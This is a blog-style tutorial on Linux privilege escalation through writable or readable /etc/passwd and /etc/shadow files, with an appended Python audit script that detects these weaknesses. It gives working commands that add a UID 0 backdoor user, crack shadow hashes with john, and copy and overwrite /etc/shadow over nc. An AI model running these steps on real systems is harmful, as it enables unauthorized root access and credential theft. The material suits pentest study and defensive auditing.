Privilege Escalation Techniques Series | Linux | weak file permissions

Sneh bavarva
5 min read · Oct 6, 2024


As I mentioned in my previous blog, without wasting any more time let’s start with our first technique to escalate our privileges on Linux systems.

This is a very minor thing that most people can miss, but permissions do matter!

Basic file permissions in Linux

Before looking at weak file permissions, it’s important to understand Linux file permissions. There are three types of permissions on a file: read, write, and execute. These permissions are associated with three categories: owner, group, and others. Each category can hold any combination of the three permission types:

Permission Types

  • Read (r): Allows viewing the contents of a file or listing the contents of a directory.
  • Write (w): Allows modifying or deleting the contents of a file or creating/deleting files in a directory.
  • Execute (x): Allows running a file as a program or accessing a directory (entering it using cd).

File Permission Structure

Permissions are displayed using the ls -l command. The output looks something like:

-rwxr-xr--

First character: Denotes the file type:

  • - : Regular file
  • d : Directory
  • l : Symbolic link

Next nine characters: These are the permissions for the owner, group, and others, grouped as:

  • rwx : Owner’s permissions
  • r-x : Group’s permissions
  • r-- : Others’ permissions

Changing Permissions

You can change the file permissions using the chmod command.

Symbolic method:

  • Add permissions: chmod u+x file.txt (adds execute permission for the owner)
  • Remove permissions: chmod g-w file.txt (removes write permission for the group)
  • Set permissions: chmod o=r file.txt (sets others to read-only)

You can read the blog linked above if you want to learn about permissions in more detail.

Permission Path

The two files that matter here are the passwd and shadow files. Whenever you enter your username (e.g. kali) and a password, the system first looks the user up in /etc/passwd and then goes to /etc/shadow to check the password you provided. In the shadow file the password is stored in hash format.

/etc/passwd
/etc/shadow

In the image below, the left side shows the passwd file and the right side the shadow file, where the password is stored in hash format.

su root -> look the user up in /etc/passwd (is the user present, and what is in its password field?) -> then look up the user’s hash in /etc/shadow -> verify the supplied password against the hash from the shadow file

We now focus on two files, passwd and shadow, and on how their file permissions can be leveraged to escalate privileges.

Passwd file — usernames are stored here

A couple of notable things about this file:

  • It has read permission for everyone
  • It’s super RARE for a hash to be written directly here, and it is not detected by automated tools like linpeas

But if it has write permission, then you can:

  1. remove the x, so the system won’t check the shadow file
  2. write the hash directly into /etc/passwd
  3. create another user in /etc/passwd as a backdoor

It’s straightforward if you think about it: you are either adding a new user or changing an existing user’s password. Follow the steps below to generate the password in hash format (though a normal string also works in the passwd file).

Follow the steps below on your Kali machine to generate a password hash with openssl. openssl is installed by default on Kali; it is mostly used to encrypt things on web servers, but yes, we can generate password hashes with it too.

# generate a password hash for the new user
openssl passwd -1 -salt $salt $password

# for example. Try to avoid a hashed password containing special characters; the $ is unavoidable, as that is the format of a passwd hash.
openssl passwd -1 -salt aaa admin134

# resulting hashed password
$1$aaa$2gZh60XPpDSkkMhy5ZfQ71

Now that we have generated the password hash, we need to put it into the victim machine’s passwd file.

# add the new user to /etc/passwd; remember to escape the special character $ by adding a backslash \ in front of it.
echo "admin2:\$1\$aaa\$2gZh60XPpDSkkMhy5ZfQ71:0:0:test:/root:/bin/bash" >> /etc/passwd

# switch to the newly created user
su admin2

Sweet! Now you can switch to admin2 with the password admin134.

Shadow file — usernames & password hashes are stored here

There are two cases here: read permission and write permission.

If it has read permission,

  • read /etc/shadow and copy the hash of the user you want
  • crack it with john/hashcat
echo 'hash_from_shadow' > hash
john hash --wordlist=rockyou.txt

But if it has write permission, then

we can manipulate the file and change the hash for root.

The simple way is to do the same thing we did for /etc/passwd: generate a hash and store it in the shadow file with nano/vim/vi. But what if our shell doesn’t support any text editor? Then we can use nc to transfer the shadow file to our Kali machine, modify it there, and send it back to the victim.

  1. first, we have to start nc on the victim machine
nc -nvlp 5555 < /etc/shadow

2. then start nc on the attack machine with the victim’s ip and port

3. so, the file arrives on our attack machine. Now create a new hash with openssl/mkpasswd

mkpasswd is not available on other distros (only on Kali), which is why openssl is preferred

Make the hash on Kali and transfer the file back to the victim:

openssl passwd -6 hello
# now replace the old hash in the downloaded shadow file with the new one
# on the victim machine, listen and write the incoming file over /etc/shadow
nc -nvlp 5555 > /etc/shadow
# on the attack machine, send the modified file to the victim
nc victim_ip 5555 < shadow

We first transferred the shadow file to our Kali machine and, after changing a user’s hash or adding a new user, transferred it back to the victim as the shadow file. We did all of this with the nc method, but you can do it with any other transfer method.

Even if we change the hash type while editing the shadow file, it still works: you can put an MD5 hash or any other type into the shadow file regardless of what hash was previously stored.
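As an added defender-side example (not part of the original post), here is a small Python audit that looks for the weak permissions and the passwd/shadow manipulations described in both sections above: a hash placed directly in the passwd password field, an extra UID 0 account, a writable passwd or shadow file, and a world-readable shadow file. The sample passwd content and the function names are constructed for this example.

```python
import os
import stat

# Constructed sample /etc/passwd content for offline testing (not a real system file).
# The admin2 line mirrors the backdoor entry discussed above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kali:x:1000:1000:kali:/home/kali:/bin/bash
admin2:$1$aaa$2gZh60XPpDSkkMhy5ZfQ71:0:0:test:/root:/bin/bash
"""

def audit_passwd_lines(lines):
    """Flag passwd entries whose password field bypasses /etc/shadow,
    passwordless entries, and non-root accounts with UID 0."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"malformed entry: {line}")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append(f"{name}: empty password field (no password required)")
        elif pw not in ("x", "*", "!", "!!"):   # 'x' means "look in /etc/shadow"
            findings.append(f"{name}: password field holds a hash (bypasses /etc/shadow)")
        if uid == "0" and name != "root":
            findings.append(f"{name}: non-root account with UID 0")
    return findings

def audit_mode(path, mode):
    """Flag weak permission bits; mode is the st_mode integer from os.stat."""
    findings = []
    if mode & (stat.S_IWOTH | stat.S_IWGRP):
        findings.append(f"{path}: writable by group or others")
    # Debian-style 640 root:shadow is expected, so only flag 'others' read on shadow.
    if path.endswith("shadow") and mode & stat.S_IROTH:
        findings.append(f"{path}: readable by others")
    return findings

def audit_file(path):
    """Audit a real file: permission bits, plus content checks for passwd."""
    findings = audit_mode(path, os.stat(path).st_mode)
    if path.endswith("passwd"):
        with open(path) as fh:
            findings += audit_passwd_lines(fh)
    return findings

if __name__ == "__main__":
    print(audit_passwd_lines(SAMPLE_PASSWD.splitlines()))
    for p in ("/etc/passwd", "/etc/shadow"):
        print(p, audit_file(p))
```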

I know this is a bit messy, but from the next stories on I will try to be more structured and to the point. Feel free to connect and correct me if there’s something wrong :)

And let’s connect on https://www.linkedin.com/in/snehbavarva/ — make sure to drop a message after connecting!
